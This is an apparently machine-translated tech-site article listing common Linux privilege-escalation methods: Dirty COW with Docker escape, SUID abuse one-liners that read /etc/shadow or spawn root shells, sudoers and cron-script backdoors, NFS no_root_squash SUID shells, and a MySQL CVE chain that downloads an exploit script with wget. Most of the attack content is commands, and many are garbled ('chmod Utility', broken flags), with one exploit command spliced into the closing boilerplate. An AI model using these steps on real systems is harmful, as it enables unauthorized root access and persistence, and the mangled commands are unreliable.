Shulou(Shulou.com)06/01 Report--

This article introduces the relevant knowledge of "introduction of common ways to raise rights in Linux". In the operation of actual cases, many people will encounter such a dilemma, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!

1. Kernel vulnerability rights

When it comes to kernel vulnerability rights, we have to mention dirty cow vulnerability (Dirty Cow), which is one of the longest-standing and most widespread vulnerabilities. Low-privilege users can take advantage of this vulnerability to raise rights locally, and at the same time, through this vulnerability, they can escape from the Docker container and obtain the shell with root authority.

1.1 Local kernel rights

(1) detect the kernel version

# View system release lsb_release-a # View kernel version uname-a

(2) download, compile and generate exp files

Bypass@ubuntu:~$ make

(3) if the execution succeeds, a shell with root permission is returned.

1.2 using DirtyCow vulnerabilities to achieve Docker Escape

(1) enter the container, compile POC and execute:

(2) the shell bounced by the host was successfully received on the attacker's machine.

1.3 Auxiliary tools for Linux lifting

Github project address:

Https://github.com/mzet-/linux-exploit-suggester.git

(1) automatically find the corresponding lifting script according to the operating system version number

Wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh-O les.sh

(2) download poc according to the prompt, compile and execute.

2. Take advantage of SUID to raise rights

SUID is a special permission that allows the caller to temporarily gain the permissions of the owner of the file during execution. If you can find and run a SUID file owned by the root user, you can get root privileges when you run the file.

(1) find the SUID file in Linux that can be used to claim rights.

Find /-perm-UBSs-type f 2 > / dev/null

(2) execute commands with root authority through find

Commands and gestures that can be used to elevate the weight of Linux:

# Find find pentestlab-exec whoami\; # Vim vim.tiny / etc/shadow # awk awk 'BEGIN {system ("whoami")}' # curl curl file:///etc/shadow # Bash bash-p # Less less / etc/passwd # Nmap nmap-- interactive

3. SUDO raises the right.

The average user executes the command in root mode when using sudo to execute the command. In many scenarios, administrators elevate rights due to incorrect sudoer configuration files for the convenience of operation and maintenance.

(1) set sudo password-free

$vi / etc/sudoers is added on the last line: bypass ALL= (ALL:ALL) NOPASSWD:ALL

(2) View the permissions of sudo

4. Plan tasks

If you can find a scheduled task script that can be modified with permission, you can modify the script to lift the rights. In essence, file permissions are improperly configured.

(1) check the scheduled task and find the scheduled task script with permission to modify.

Ls-l / etc/cron* more / etc/crontab

(2) add SUID shell backdoor to mysqlback.sh so that you can obtain root permission when the scheduled task is executed with root again.

Cp / bin/bash / tmp/shell chmod Utility / tmp/shell

5. NFS raises the right.

When there is a NFS share in the server, if the no_root_squash option is turned on, if the client uses the root user, then the client has root permission for the shared directory, which can be used to elevate permissions.

(1) View the shared directory on the NFS server

Sudo showmount-e 10.1.1.233

(2) create a local mount directory and mount the shared directory. Create a Suid shell with the attacker's local root privileges.

Sudo mkdir-p / tmp/data sudo mount-t nfs 10.1.1.233:/home/bypass / tmp/data cp / bin/bash / tmp/data/shell chmod Utility / tmp/data/shell

(3) go back to the server where you want to claim rights, and use ordinary users to use the-p parameter to obtain root permissions.

6. MySQL raises the right

MySQL rights can be raised by UDF, MOF, and writing startup items, but what is interesting is that the combined use of CVE-2016-6663 and CVE-2016-6664 can raise a www-data permission to root permission.

(1) use CVE-2016-6663 to upgrade www-data permission to mysql permission:

Cd / var/www/html/ gcc mysql-privesc-race.c-o mysql-privesc-race-I/usr/include/mysql-lmysqlclient. / mysql-privesc-race test 123456 localhost testdb

(2) use CVE-2016-6664 to upgrade Mysql permissions to root permissions:

This is the end of the introduction to wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh chmod 777 mysql-chowned.sh. / mysql-chowned.sh / var/log/mysql/error.log "introduction to the Common ways to raise Rights in Linux". Thank you for your reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.